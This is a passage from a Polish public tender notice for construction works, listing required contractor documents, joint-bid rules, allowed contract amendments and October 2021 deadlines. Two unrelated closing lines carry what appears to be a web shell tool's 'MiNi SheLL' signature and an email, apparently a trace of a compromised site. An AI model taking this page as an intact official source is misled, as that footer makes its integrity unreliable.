wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, o których<br/>mowa w pkt. 19.1.4.2 SWZ, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg<br/>wzoru stanowiącego załącznik do materiałów postępowania).<br/>W przypadku, gdy Wykonawca polega na osobach zdolnych do wykonania zamówienia innych<br/>podmiotów niezależnie od charakteru łączących go z nimi stosunków, do wykazu załącza pisemne<br/>zobowiązanie innych podmiotów do oddania Wykonawcy, do dyspozycji niezbędnych osób na okres<br/>korzystania z nich przy wykonaniu zamówienia.<br/>20.1.3. oświadczenie dotyczące kierowników skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego odpowiedzialnego za kierowanie robotami budowlanymi w branży ogólnobudowlanej,<br/>sanitarnej i elektrycznej, o którym mowa w pkt. 19.1.4.3. SWZ (wg wzoru stanowiącego załącznik do<br/>materiałów postępowania), wraz z informacjami na temat kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia oraz informacji o podstawie do dysponowania tymi osobami.<br/>20.1.4. dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną<br/>określoną przez zamawiającego w pkt. 19.1.3. SWZ.<br/>20.1.5. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw<br/>wykluczenia na podstawie art. 109 ust.1 pkt.4 ustawy. Dokument ten ma być złożony dla Wykonawcy,<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podwykonawców</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 19.3. W przypadku wspólnego ubiegania się o zamówienie Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są do łącznego spełnienia<br/>takich samych warunków udziału w postępowaniu o udzielenie zamówienia, jak wykonawcy<br/>występujący samodzielnie tj: przy ocenie spełnienia warunków, o których mowa w art. 112<br/>ustawy, zamawiający będzie brał pod uwagę łączny potencjał techniczny i kadrowy<br/>wykonawców, ich łączne kwalifikacje oraz łączną sytuację ekonomiczną i finansową przy czym:<br/>19.3.1.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki,<br/>o których mowa w pkt. 19.1.3. SWZ, zostaną spełnione wyłącznie wtedy gdy jeden z<br/>Wykonawców będzie posiadał dokument potwierdzający ubezpieczenie od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w pełnej<br/>wysokości sumy gwarancyjnej wymaganej przez Zamawiającego w pkt. 19.1.3. SWZ.<br/>19.3.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki,<br/>o których mowa w pkt. 19.1.4.1. SWZ, zostaną spełnione wyłącznie wtedy gdy jeden z<br/>Wykonawców wykaże się wykonaniem wszystkich wymaganych robót budowlanych<br/>samodzielnie. Za spełnienie warunku nie będzie uznane wykazanie, że np. „Wykonawca A”<br/>wykonał 1 robotę budowlaną i „Wykonawca B” wykonał 1 robotę budowlaną.<br/>19.4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenia zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>19.5. W przypadku, o którym mowa wyżej, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy.<br/>19.6. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu<br/>polegać na zdolnościach zawodowych lub sytuacji ekonomicznej podmiotów udostępniających<br/>zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>19.7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>I pozostałe zawarte w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony dopuszczają możliwość wprowadzenia zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia:<br/>a) Zgodnie z postanowieniem art. 455 ust. 1 pkt. 1 ustawy, tj. niezależnie od wartości tych zmian,<br/>o ile możliwość dokonania tych zmian została przewidziana w ogłoszeniu o zamówieniu lub w<br/>SWZ w postaci jasnych, precyzyjnych i jednoznacznych postanowień umownych, obejmujących<br/>zasady wprowadzania zmian wysokości wynagrodzenia Wykonawcy, jeżeli spełniają one łącznie<br/>następujące warunki:<br/>- określają rodzaj i zakres zmian;<br/>- określają warunki wprowadzenia zmian;<br/>- nie modyfikują ogólnego charakteru umowy.<br/>Stosownie do powyższego dopuszczalne są następujące zmiany umowy:<br/>aa) zmiany wynikające ze zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia<br/>niniejszej umowy wraz ze skutkami takiej zmiany regulacji prawnych,<br/>bb) zmiana terminu wykonania Przedmiotu zamówienia w sytuacji wskazanej w § 1 ust. 5,<br/>cc) zmiany wynikające z powierzenia Podwykonawcy wykonania części Przedmiotu zamówienia<br/>w zakresie wynikającym z umowy między Wykonawcą a Podwykonawcą zaakceptowanej przez<br/>Zamawiającego lub zmiany Podwykonawcy w sytuacji, gdy z przyczyn, których nie można było<br/>przewidzieć w chwili zawarcia z nim umowy dotyczącej wykonywania Przedmiotu zamówienia,<br/>koniecznym będzie dla prawidłowego jego wykonania posłużenie się przez Wykonawcę nowym<br/>Podwykonawcą, który będzie realizował część lub cały zakres prac powierzony uprzednio<br/>innemu Podwykonawcy. Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na<br/>którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy, w<br/>celu wykazania spełniania warunków udziału w postępowaniu Wykonawca jest obowiązany<br/>wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie<br/>spełnia je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca<br/>powoływał się w trakcie postępowania o udzielenie zamówienia i nie podlega wykluczeniu z<br/>postępowania; przepis art. 122 ustawy stosuje się odpowiednio;<br/>dd) zmiany zakresu części Przedmiotu zamówienia powierzonego Podwykonawcom wynikające<br/>z aneksów do umów zawartych przez Wykonawcę z Podwykonawcami i zaakceptowanych przez<br/>Zamawiającego w przypadku wykonywania Przedmiotu zamówienia z udziałem<br/>Podwykonawców.<br/>b) zaistnienia konieczności wykonania przez Wykonawcę dodatkowych dostaw, usług lub robót<br/>budowlanych, których nie uwzględniono w zamówieniu podstawowym (przedmiocie<br/>zamówienia), o ile stały się niezbędne, a ponadto spełnione są łącznie następujące warunki:<br/>aa)zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub<br/>technicznych, w szczególności dotyczących zamienności lub interoperacyjności wyposażenia,<br/>usług lub instalacji zamówionych w ramach zamówienia podstawowego (przedmiotu<br/>zamówienia);<br/>bb)zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów<br/>dla Zamawiającego;cc) wzrost wynagrodzenia Wykonawcy spowodowany każdą kolejną zmianą nie przekracza 50%<br/>wartości niniejszej umowy,<br/>c) gdy zmiana umowy spowodowana jest okolicznościami, których Zamawiający działając z<br/>należytą starannością nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru<br/>umowy i jednocześnie wzrost wartości wynagrodzenia Wykonawcy spowodowany każdą kolejną<br/>zmianą nie przekracza 50% wartości niniejszej umowy,<br/>d) gdy Wykonawcę ma zastąpić inny podmiot:<br/>aa) na podstawie postanowień umownych, o których mowa w pkt. a),<br/>oraz pozostałe zawarte w ROZDZIALE III SWZ Postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zgnmokotow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com